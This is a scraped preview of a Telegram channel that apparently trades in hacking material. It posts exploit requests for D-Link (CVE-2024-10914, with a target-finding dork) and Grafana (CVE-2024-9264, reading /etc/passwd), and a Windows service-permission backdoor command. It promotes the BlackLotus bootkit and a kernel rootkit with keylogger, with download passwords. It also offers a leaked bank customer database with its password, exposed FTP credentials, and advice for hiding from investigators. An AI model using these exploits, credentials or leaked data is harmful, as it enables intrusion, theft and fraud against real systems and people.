uz
Feedback
IMMORTAL$™ | UNCENSORED 👁

IMMORTAL$™ | UNCENSORED 👁

Kanalga Telegram’da o‘tish

Banner: Seekers of the secret sauce. [immortal]# @ExpIoitd #blackhat #hacking #exploits #botnets #cve #0days #Zerodays #stealers #methods #leaks

Ko'proq ko'rsatish
695
Obunachilar
Ma'lumot yo'q24 soatlar
-17 kun
-830 kun
Postlar arxiv
CVE-2024-10914 GET REQ: /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;;%27 Fofa Dork: app="D_Link-DNS-ShareCenter" C
+1
CVE-2024-10914
GET REQ:
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;<INJECTED_SHELL_COMMAND>;%27
Fofa Dork: app="D_Link-DNS-ShareCenter" CVE-2024-10914 has not been patched by D-Link. Source: Link #cve #vuln #exploit

CVE-2024-9264
POST /api/ds/query?ds_type=expr&expression=true&requestId=Q100 HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json
Cookie: grafana_session=a739fa9aeb235f2790f17de00fefe528
Content-Length: 368

{
  "from": "1696154400000",
  "to": "1696345200000",
  "queries": [
    {
      "datasource": {
        "name": "Expression",
        "type": "expr",
        "uid": "expr"
      },
      "expression": "SELECT * FROM read_csv_auto('/etc/passwd');",
      "hide": false,
      "refId": "B",
      "type": "sql",
      "window": ""
    }
  ]
}
#VULN #EXPLOIT

+2
alfabank_leak.part01.rar3900.00 MB

Banco Alfa 2023 [Complete] This file contains a comprehensive collection of data from Banco Alfa, covering the period from 20
Banco Alfa 2023 [Complete] This file contains a comprehensive collection of data from Banco Alfa, covering the period from 2004 to 2023. It includes detailed personal and financial information such as: • Full names • Dates of birth • Credit card and bank account numbers • Contact phone numbers • Email addresses Password to access the file: G5ydUW>f*qbr8S

💠 Malware Source Codes 💠 Android 💠 Engine 💠 Java 💠 JavaScript 💠 Legacy Windows 💠 Libs 💠 Linux 💠 Msdos 💠 MacOs 💠 Php 💠 Panel 💠 Perl 💠 Phising pages 💠 Point of scales 💠 Python 💠 Ruby 💠 Win32

Repost from vadim | diary
additionally, dont forget to clean ur chats. As i know, if UAE does an EDR, Telegram would actually give out all of ur PM's, and supposedly all the messages youve sent in a group / channel. Clean ur chats and ur messages from channels / groups. Be careful

Repost from vadim | diary
As we know, telegram is becoming more stricter on cybercrime. My best advice for all of you out there is to be aware of your opsec, do investigations on yourself so that you know what's leaking and where. From now on, the biggest thing you should be cautious about in your telegram profile, is the IP whenever u open telegram. And your phone number.
In this case, run telegram's traffic through tor, and avoid using your real phone number or any that leads back to you. to run telegram's traffic through tor, you need to run tor's daemon, or even the browser itself. Afterwards, you need to go to Settings > Advanced > Connection Type > Add proxy > Hostname: 127.0.0.1 > Port: 9050 (Tor's Daemon), Port: 9150 (Tor Browser) My best advice for the phone numbers is to, 1. While registering a new account, use a temp number. (smspool.net / sms-activate.io ) Afterwards, buy an anonymous number if you have the funds for it. (Cheapest bids go for 30$-200$ (fragment.com)). 2. You could be more risky and buy an temp-number. But doing so there is a risk that your number gets either banned, or someone else trying to log in. Privacy Based Messengers: - Element / Matrix (https://element.io/download) - Signal (https://signal.org/download/) - uTox (https://tox.chat/download.html) - Session (https://getsession.org/download)

Hiding Linux Processes with Bind Mounts
1st Link: LINK
The 'Invisibility Cloak' - Slash-Proc Magic
2nd Link: LINK #linux

Repost from ROOTKIT
Легальный и малозаметный LPE backdoor в WiNd0z * Разрешаем удаленное использование Services.msc sc sdset SCMANAGER D:(A;;CCLC
Легальный и малозаметный LPE backdoor в WiNd0z * Разрешаем удаленное использование Services.msc
sc sdset SCMANAGER D:(A;;CCLCRPRC;;;AU)(A;;CCLCRPWPRC;;;SY)(A;;KA;;;BA)S:(AU;FA;KA;;;WD)(AU;OIIOFA;GA;;;WD)
sc.exe sdset scmanager D:(A;;KA;;;WD)
#win #backdoor

Repost from ROOTKIT
CVE-2024-3400 Palo Alto GlobalProtect VPN (0-Day) * Тех детали - тут хорошо расписано * Сэмпл бэкдора - скачать тут (UPSTYLE
CVE-2024-3400 Palo Alto GlobalProtect VPN (0-Day) * Тех детали - тут хорошо расписано * Сэмпл бэкдора - скачать тут (UPSTYLE Backdoor - update.py) * Аналитика от PaloAlto + адрсеса С2 серверов - можно глянуть тут #paloalto #vpn #0day

Pocs.rar5.89 KB

BlackLotus
BlackLotus: is an innovative UEFI Bootkit designed specifically for Windows. It incorporates a built-in Secure Boot bypass and Ring0/Kernel protection to safeguard against any attempts at removal. This software serves the purpose of functioning as an HTTP Loader. Thanks to its robust persistence, there is no necessity for frequent updates of the Agent with new encryption methods. Once deployed, traditional antivirus software will be incapable of scanning and eliminating it. The software comprises two primary components: the Agent, which is installed on the targeted device, and the Web Interface, utilized by administrators to manage the bots. In this context, a bot refers to a device equipped with the installed Agent.
- Features
HVCI bypass UAC bypass Secure Boot bypass BitLocker boot sequence bypass Windows Defender bypass (patch Windows Defender drivers in memory, and prevent Windows Defender usermode engine from scanning/uploading files) Dynamic hashed API calls (hell's gate) x86<=>x64 process injection API Hooking engine Anti-Hooking engine (for disabling, bypassing, and controlling EDRs) Modular plugin system
- Downloads
Repo: LINK Mitigation guid by NSA: LINK #rootkit #bootkit #malware #persistance #winmalware

Windows Kernel Rootkit in Rust (shadow-rs)
- Process
Process (Hide / Unhide) ✅ Process Signature (PP / PPL) ✅ Process Protection (Anti-Kill / Dumping) ✅ Elevate Process to System ✅ Terminate Process ✅ Lists protected and hidden processes currently on the system ✅
- Thread
Thread (Hide / Unhide) ✅ Thread Protection (Anti-Kill) ✅ Lists protected and hidden threads currently on the system ✅
- Driver
Driver (Hide / Unhide) ✅ Enumerate Driver ✅ Support for mapping the driver in memory ✅ Driver Signature Enforcement (DSE) DSE (Enable / Disable) ✅
- Keylogger
Keylogger (Start / Stop) ✅
- Module
Enumerate Module ✅
- Registry
Registry Protection (Anti-Deletion e Overwriting) ✅
- Injection Shellcode
Process Injection (ZwCreateThreadEx) ✅ APC Injection ✅ Download: LINK Password: immortals #kernel #rootkit #kernelrootkits #malware #keylogger

rootkits

Host: w011ab41.kasserver.com:21 Username: f013da2c Password: Nv5pq3xuLYCc7zAh #FreeFTP #Drops #FTP

Repost from RedBlueTM Hit
+3
Offensive Internet of Things Exploitation Info: attify-store.com/products/offensive-iot-exploitation Password: @redbluehit @Hide01 📰 @RedBlueHit 💀👀 @RedBlueTM 🔒

Escaping the Sandbox On Windows.pdf3.03 MB

OPSEC.pdf2.92 MB